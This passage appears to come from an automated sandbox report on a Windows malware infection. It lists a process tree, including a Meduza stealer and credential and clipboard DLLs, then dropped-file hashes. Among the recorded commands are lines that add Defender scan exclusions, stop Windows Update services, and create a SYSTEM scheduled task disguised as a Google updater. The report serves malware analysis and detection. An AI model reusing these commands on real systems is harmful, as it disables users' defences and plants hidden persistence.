                                                              CACLS "..\e8bff37b77" /P "Admin:N"
                                                              7⤵
                                                                PID:2268
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                7⤵
                                                                  PID:2140
                                                                • C:\Windows\SysWOW64\cacls.exe
                                                                  CACLS "..\e8bff37b77" /P "Admin:R" /E
                                                                  7⤵
                                                                    PID:3068
                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\aca439ae61e801\cred64.dll, Main
                                                                  6⤵
                                                                  • Loads dropped DLL
                                                                  PID:2324
                                                                  • C:\Windows\system32\rundll32.exe
                                                                    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\aca439ae61e801\cred64.dll, Main
                                                                    7⤵
                                                                    • Loads dropped DLL
                                                                    PID:2308
                                                                    • C:\Windows\system32\WerFault.exe
                                                                      C:\Windows\system32\WerFault.exe -u -p 2308 -s 320
                                                                      8⤵
                                                                      • Loads dropped DLL
                                                                      • Program crash
                                                                      PID:1812
                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\aca439ae61e801\clip64.dll, Main
                                                                  6⤵
                                                                  • Loads dropped DLL
                                                                  PID:1544
                                                            • C:\Users\Admin\AppData\Local\Temp\1000173001\Meduza.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\1000173001\Meduza.exe"
                                                              4⤵
                                                              • Checks computer location settings
                                                              • Executes dropped EXE
                                                              • Accesses Microsoft Outlook profiles
                                                              • outlook_office_path
                                                              • outlook_win_path
                                                              PID:2920
                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                              "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
                                                              4⤵
                                                              • Loads dropped DLL
                                                              PID:620
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                          2⤵
                                                          • Drops file in System32 directory
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:2620
                                                        • C:\Windows\System32\cmd.exe
                                                          C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                          2⤵
                                                            PID:2220
                                                            • C:\Windows\System32\sc.exe
                                                              sc stop UsoSvc
                                                              3⤵
                                                              • Launches sc.exe
                                                              PID:2668
                                                            • C:\Windows\System32\sc.exe
                                                              sc stop WaaSMedicSvc
                                                              3⤵
                                                              • Launches sc.exe
                                                              PID:1960
                                                            • C:\Windows\System32\sc.exe
                                                              sc stop wuauserv
                                                              3⤵
                                                              • Launches sc.exe
                                                              PID:2880
                                                            • C:\Windows\System32\sc.exe
                                                              sc stop bits
                                                              3⤵
                                                              • Launches sc.exe
                                                              PID:2264
                                                            • C:\Windows\System32\sc.exe
                                                              sc stop dosvc
                                                              3⤵
                                                              • Launches sc.exe
                                                              PID:2016
                                                          • C:\Windows\System32\cmd.exe
                                                            C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                            2⤵
                                                              PID:1036
                                                              • C:\Windows\System32\powercfg.exe
                                                                powercfg /x -hibernate-timeout-ac 0
                                                                3⤵
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1032
                                                              • C:\Windows\System32\powercfg.exe
                                                                powercfg /x -hibernate-timeout-dc 0
                                                                3⤵
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1832
                                                              • C:\Windows\System32\powercfg.exe
                                                                powercfg /x -standby-timeout-ac 0
                                                                3⤵
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1472
                                                              • C:\Windows\System32\powercfg.exe
                                                                powercfg /x -standby-timeout-dc 0
                                                                3⤵
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1868
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                                                              2⤵
                                                              • Drops file in System32 directory
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:1996
                                                              • C:\Windows\system32\schtasks.exe
                                                                "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
                                                                3⤵
                                                                • Creates scheduled task(s)
                                                                PID:312
                                                            • C:\Windows\System32\schtasks.exe
                                                              C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
                                                              2⤵
                                                                PID:440
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                2⤵
                                                                • Drops file in System32 directory
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:2084
                                                              • C:\Windows\System32\cmd.exe
                                                                C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                2⤵
                                                                  PID:1640
                                                                  • C:\Windows\System32\sc.exe
                                                                    sc stop UsoSvc
                                                                    3⤵
                                                                    • Launches sc.exe
                                                                    PID:2460
                                                                  • C:\Windows\System32\sc.exe
                                                                    sc stop WaaSMedicSvc
                                                                    3⤵
                                                                    • Launches sc.exe
                                                                    PID:476
                                                                  • C:\Windows\System32\sc.exe
                                                                    sc stop wuauserv
                                                                    3⤵
                                                                    • Launches sc.exe
                                                                    PID:2476
                                                                  • C:\Windows\System32\sc.exe
                                                                    sc stop bits
                                                                    3⤵
                                                                    • Launches sc.exe
                                                                    PID:880
                                                                  • C:\Windows\System32\sc.exe
                                                                    sc stop dosvc
                                                                    3⤵
                                                                    • Launches sc.exe
                                                                    PID:1816
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                                                                  2⤵
                                                                  • Drops file in System32 directory
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:2436
                                                                  • C:\Windows\system32\schtasks.exe
                                                                    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
                                                                    3⤵
                                                                    • Creates scheduled task(s)
                                                                    PID:2260
                                                                • C:\Windows\System32\cmd.exe
                                                                  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                  2⤵
                                                                    PID:1368
                                                                    • C:\Windows\System32\powercfg.exe
                                                                      powercfg /x -hibernate-timeout-ac 0
                                                                      3⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:1608
                                                                    • C:\Windows\System32\powercfg.exe
                                                                      powercfg /x -hibernate-timeout-dc 0
                                                                      3⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2348
                                                                    • C:\Windows\System32\powercfg.exe
                                                                      powercfg /x -standby-timeout-ac 0
                                                                      3⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:616
                                                                    • C:\Windows\System32\powercfg.exe
                                                                      powercfg /x -standby-timeout-dc 0
                                                                      3⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2180
                                                                  • C:\Windows\System32\schtasks.exe
                                                                    C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
                                                                    2⤵
                                                                      PID:764
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                      2⤵
                                                                      • Drops file in System32 directory
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:1768
                                                                    • C:\Windows\System32\cmd.exe
                                                                      C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                      2⤵
                                                                        PID:700
                                                                        • C:\Windows\System32\sc.exe
                                                                          sc stop UsoSvc
                                                                          3⤵
                                                                          • Launches sc.exe
                                                                          PID:2384
                                                                        • C:\Windows\System32\sc.exe
                                                                          sc stop WaaSMedicSvc
                                                                          3⤵
                                                                          • Launches sc.exe
                                                                          PID:300
                                                                        • C:\Windows\System32\sc.exe
                                                                          sc stop wuauserv
                                                                          3⤵
                                                                          • Launches sc.exe
                                                                          PID:1092
                                                                        • C:\Windows\System32\sc.exe
                                                                          sc stop bits
                                                                          3⤵
                                                                          • Launches sc.exe
                                                                          PID:2000
                                                                        • C:\Windows\System32\sc.exe
                                                                          sc stop dosvc
                                                                          3⤵
                                                                          • Launches sc.exe
                                                                          PID:876
                                                                      • C:\Windows\System32\cmd.exe
                                                                        C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                        2⤵
                                                                          PID:2984
                                                                          • C:\Windows\System32\powercfg.exe
                                                                            powercfg /x -hibernate-timeout-ac 0
                                                                            3⤵
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:904
                                                                          • C:\Windows\System32\powercfg.exe
                                                                            powercfg /x -standby-timeout-ac 0
                                                                            3⤵
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:840
                                                                          • C:\Windows\System32\powercfg.exe
                                                                            powercfg /x -hibernate-timeout-dc 0
                                                                            3⤵
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1180
                                                                          • C:\Windows\System32\powercfg.exe
                                                                            powercfg /x -standby-timeout-dc 0
                                                                            3⤵
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:2832
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                                                                          2⤵
                                                                          • Drops file in System32 directory
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:2504
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
                                                                            3⤵
                                                                            • Creates scheduled task(s)
                                                                            PID:2720
                                                                        • C:\Windows\System32\schtasks.exe
                                                                          C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
                                                                          2⤵
                                                                            PID:2688
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                            2⤵
                                                                            • Drops file in System32 directory
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:3260
                                                                          • C:\Windows\System32\cmd.exe
                                                                            C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                            2⤵
                                                                              PID:3348
                                                                              • C:\Windows\System32\sc.exe
                                                                                sc stop UsoSvc
                                                                                3⤵
                                                                                • Launches sc.exe
                                                                                PID:3368
                                                                              • C:\Windows\System32\sc.exe
                                                                                sc stop WaaSMedicSvc
                                                                                3⤵
                                                                                • Launches sc.exe
                                                                                PID:3380
                                                                              • C:\Windows\System32\sc.exe
                                                                                sc stop wuauserv
                                                                                3⤵
                                                                                • Launches sc.exe
                                                                                PID:3392
                                                                              • C:\Windows\System32\sc.exe
                                                                                sc stop bits
                                                                                3⤵
                                                                                • Launches sc.exe
                                                                                PID:3404
                                                                              • C:\Windows\System32\sc.exe
                                                                                sc stop dosvc
                                                                                3⤵
                                                                                • Launches sc.exe
                                                                                PID:3416
                                                                            • C:\Windows\System32\cmd.exe
                                                                              C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                              2⤵
                                                                                PID:3428
                                                                                • C:\Windows\System32\powercfg.exe
                                                                                  powercfg /x -hibernate-timeout-ac 0
                                                                                  3⤵
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:3448
                                                                                • C:\Windows\System32\powercfg.exe
                                                                                  powercfg /x -hibernate-timeout-dc 0
                                                                                  3⤵
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:3480
                                                                                • C:\Windows\System32\powercfg.exe
                                                                                  powercfg /x -standby-timeout-ac 0
                                                                                  3⤵
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:3504
                                                                                • C:\Windows\System32\powercfg.exe
                                                                                  powercfg /x -standby-timeout-dc 0
                                                                                  3⤵
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:3532
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                                                                                2⤵
                                                                                • Drops file in System32 directory
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:3460
                                                                                • C:\Windows\system32\schtasks.exe
                                                                                  "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
                                                                                  3⤵
                                                                                  • Creates scheduled task(s)
                                                                                  PID:3556
                                                                              • C:\Windows\System32\conhost.exe
                                                                                C:\Windows\System32\conhost.exe
                                                                                2⤵
                                                                                  PID:3588
                                                                                • C:\Windows\explorer.exe
                                                                                  C:\Windows\explorer.exe
                                                                                  2⤵
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:3604
                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                                                                1⤵
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:300
                                                                              • C:\Windows\system32\taskeng.exe
                                                                                taskeng.exe {BF399AE3-B7C2-4858-9BEB-0335D96FAC71} S-1-5-21-3513876443-2771975297-1923446376-1000:GPFFWLPI\Admin:Interactive:[1]
                                                                                1⤵
                                                                                  PID:2388
                                                                                  • C:\Users\Admin\AppData\Local\Temp\e8bff37b77\yiueea.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\e8bff37b77\yiueea.exe
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:2020
                                                                                  • C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:2732
                                                                                  • C:\Users\Admin\AppData\Local\Temp\ebb444342c\legosa.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\ebb444342c\legosa.exe
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:2760
                                                                                  • C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:2000
                                                                                  • C:\Users\Admin\AppData\Local\Temp\e8bff37b77\yiueea.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\e8bff37b77\yiueea.exe
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:2024
                                                                                  • C:\Users\Admin\AppData\Local\Temp\ebb444342c\legosa.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\ebb444342c\legosa.exe
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:876
                                                                                  • C:\Users\Admin\AppData\Local\Temp\e8bff37b77\yiueea.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\e8bff37b77\yiueea.exe
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:1928
                                                                                  • C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:2060
                                                                                  • C:\Users\Admin\AppData\Local\Temp\ebb444342c\legosa.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\ebb444342c\legosa.exe
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:1872
                                                                                  • C:\Users\Admin\AppData\Local\Temp\e8bff37b77\yiueea.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\e8bff37b77\yiueea.exe
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:3100
                                                                                  • C:\Users\Admin\AppData\Local\Temp\ebb444342c\legosa.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\ebb444342c\legosa.exe
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:1988
                                                                                  • C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:3204
                                                                                  • C:\Users\Admin\AppData\Local\Temp\e8bff37b77\yiueea.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\e8bff37b77\yiueea.exe
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:3432
                                                                                  • C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:3460
                                                                                  • C:\Users\Admin\AppData\Local\Temp\ebb444342c\legosa.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\ebb444342c\legosa.exe
                                                                                    2⤵
                                                                                      PID:2404
                                                                                  • C:\Windows\system32\taskeng.exe
                                                                                    taskeng.exe {5459BC98-38CE-451A-B8D6-F6B57814F1E9} S-1-5-18:NT AUTHORITY\System:Service:
                                                                                    1⤵
                                                                                    • Loads dropped DLL
                                                                                    PID:824
                                                                                    • C:\Program Files\Google\Chrome\updater.exe
                                                                                      "C:\Program Files\Google\Chrome\updater.exe"
                                                                                      2⤵
                                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                      • Drops file in Drivers directory
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of SetThreadContext
                                                                                      • Drops file in Program Files directory
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:1972
                                                                                  • C:\Windows\system32\makecab.exe
                                                                                    "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20230904013024.log C:\Windows\Logs\CBS\CbsPersist_20230904013024.cab
                                                                                    1⤵
                                                                                    • Drops file in Windows directory
                                                                                    PID:1676
                                                                                  • C:\Windows\windefender.exe
                                                                                    C:\Windows\windefender.exe
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    • Modifies data under HKEY_USERS
                                                                                    PID:1868

                                                                                  Network

                                                                                  MITRE ATT&CK Enterprise v15

                                                                                  Replay Monitor

                                                                                  Loading Replay Monitor...

                                                                                  Downloads

                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                    Filesize

                                                                                    344B

                                                                                    MD5

                                                                                    79e7d6deae7c929cc58c737cad7d2151

                                                                                    SHA1

                                                                                    8cd591b13db6123a9b6ac0ee3092fe8ee93c6d84

                                                                                    SHA256

                                                                                    8ca89c57a5a4e1625c5c7a1a18f08d70da8d18f8d2590169401ade1775d2ba87

                                                                                    SHA512

                                                                                    396f950446c854d8ee501e3234d726812ff620268cb354102ee29a3e17da646f2be2bdfdadbad4a470ba668f5353e2486997c62692ce09098789324589649987

                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                    Filesize

                                                                                    344B

                                                                                    MD5

                                                                                    bdb07e88d5d4609d23ddca77f4a93195

                                                                                    SHA1

                                                                                    bdc13f53e751a184604eb46a245b96e20aa49231

                                                                                    SHA256

                                                                                    8fbcbece4dc03d0072f471a6534205cfdc2bd3f3be29a0137eddd0823a7d8159

                                                                                    SHA512

                                                                                    ddc4decb5ff97f320932aa3904226ceafaf7d0487e829c2d58fa4569015fcedc6b49dcbeadc1b875d59071ac74d132367985037d9842f0860dae07ba48e4893e

                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                    Filesize

                                                                                    344B

                                                                                    MD5

                                                                                    6567c5b07b8a63d73e93da1457236a50

                                                                                    SHA1

                                                                                    29c36350703e433385897a26e4206e3c53445b86

                                                                                    SHA256

                                                                                    4529360705b9039a8ee90524f85e5b8bb9b44f8a4cfded276763ebbfc5f42692

                                                                                    SHA512

                                                                                    56414d890cbdcb86db2dca197cfa506e0353bfe67e969205582c44b51fd312874f6e36b38ebda90caadd40c62c42fb659c7c0ff24067342499991e9c4cd9c1fb

                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000139001\10c7b9izmah9.exe

                                                                                    Filesize

                                                                                    2.1MB

                                                                                    MD5

                                                                                    11087397686f250611da155d5a73143f

                                                                                    SHA1

                                                                                    51b39613601709a41332cede168749b09f6294f4

                                                                                    SHA256

                                                                                    a58281cf014986d06046512ca984861c6390c6ae99bf164d04d1943a8c959e7b

                                                                                    SHA512

                                                                                    09a1df0dcc5df7e8c63da422b07a9bc3843e8be18e9cce74274dc01ddaa0d16294071885128ccd97f6264a2d8bf14d453f3dcfb78e99060fe59c6d40811a17b0

                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000139001\10c7b9izmah9.exe

                                                                                    Filesize

                                                                                    2.1MB

                                                                                    MD5

                                                                                    11087397686f250611da155d5a73143f

                                                                                    SHA1

                                                                                    51b39613601709a41332cede168749b09f6294f4

                                                                                    SHA256

                                                                                    a58281cf014986d06046512ca984861c6390c6ae99bf164d04d1943a8c959e7b

                                                                                    SHA512

                                                                                    09a1df0dcc5df7e8c63da422b07a9bc3843e8be18e9cce74274dc01ddaa0d16294071885128ccd97f6264a2d8bf14d453f3dcfb78e99060fe59c6d40811a17b0

                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000146001\pf3bv0f2aw4mj.exe

                                                                                    Filesize

                                                                                    1.6MB

                                                                                    MD5

                                                                                    960401d9c2113bdb6207353557fe199d

                                                                                    SHA1

                                                                                    3513d8ed2314fdc0bc4c150b6f1028befc837639

                                                                                    SHA256

                                                                                    53bb60a7357a31c914145dafb72c45559d4f214f471274c997d2ed37969e300c

                                                                                    SHA512

                                                                                    c221693c430ee8287301e2030577971f8a06308205fbec1557d436eb2c228f6cebc6c87a11e0f56f2a098b06a3a340747b8bb751ed18a5bb035b2b11b2987fb2

                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000146001\pf3bv0f2aw4mj.exe

                                                                                    Filesize

                                                                                    1.6MB

                                                                                    MD5

                                                                                    960401d9c2113bdb6207353557fe199d

                                                                                    SHA1

                                                                                    3513d8ed2314fdc0bc4c150b6f1028befc837639

                                                                                    SHA256

                                                                                    53bb60a7357a31c914145dafb72c45559d4f214f471274c997d2ed37969e300c

                                                                                    SHA512

                                                                                    c221693c430ee8287301e2030577971f8a06308205fbec1557d436eb2c228f6cebc6c87a11e0f56f2a098b06a3a340747b8bb751ed18a5bb035b2b11b2987fb2

                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000147001\useyyoou_crypted.exe

                                                                                    Filesize

                                                                                    1.6MB

                                                                                    MD5

                                                                                    887e2ba60e03c2b0d79a63a6548e1720

                                                                                    SHA1

                                                                                    04b44c1bdbac152d6379eec5a6de4e46fd6328b3

                                                                                    SHA256

                                                                                    1379aee1bf57a5d4e826d7ef56254274f6cffa3fecaa08b2ff96dd9dfc6c7d51

                                                                                    SHA512

                                                                                    7497f8ea8d4b411e50d81e9e974144cd9a82911ac08fafe0355c33f7833c29f39dc077e7ccfa52748289e479b333662d1ede0f85d101a5ec5a86384bf0db9fb4

                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000147001\useyyoou_crypted.exe

                                                                                    Filesize

                                                                                    1.6MB

                                                                                    MD5

                                                                                    887e2ba60e03c2b0d79a63a6548e1720

                                                                                    SHA1

                                                                                    04b44c1bdbac152d6379eec5a6de4e46fd6328b3

                                                                                    SHA256

                                                                                    1379aee1bf57a5d4e826d7ef56254274f6cffa3fecaa08b2ff96dd9dfc6c7d51

                                                                                    SHA512

                                                                                    7497f8ea8d4b411e50d81e9e974144cd9a82911ac08fafe0355c33f7833c29f39dc077e7ccfa52748289e479b333662d1ede0f85d101a5ec5a86384bf0db9fb4

                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000155001\crypted158.exe

                                                                                    Filesize

                                                                                    702KB

                                                                                    MD5

                                                                                    bb115dccc24769565832379a2029f709

                                                                                    SHA1

                                                                                    fee2c45c8d2b14e87da81baf041adf6258519114

                                                                                    SHA256

                                                                                    0dbde9f9147ace2898ded2819edb2c6ad460cbbfaf6f82f15313c011634d602a

                                                                                    SHA512

                                                                                    319904a041a1cd4325c5e9e6d9cb5118517df0f0f9db85c3b9ee1d443e24f17439930e196e3439bab47aa04ec7f8806646672a873ac280d58523c9ba33d96edd

                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000155001\crypted158.exe

                                                                                    Filesize

                                                                                    702KB

                                                                                    MD5

                                                                                    bb115dccc24769565832379a2029f709

                                                                                    SHA1

                                                                                    fee2c45c8d2b14e87da81baf041adf6258519114

                                                                                    SHA256

                                                                                    0dbde9f9147ace2898ded2819edb2c6ad460cbbfaf6f82f15313c011634d602a

                                                                                    SHA512

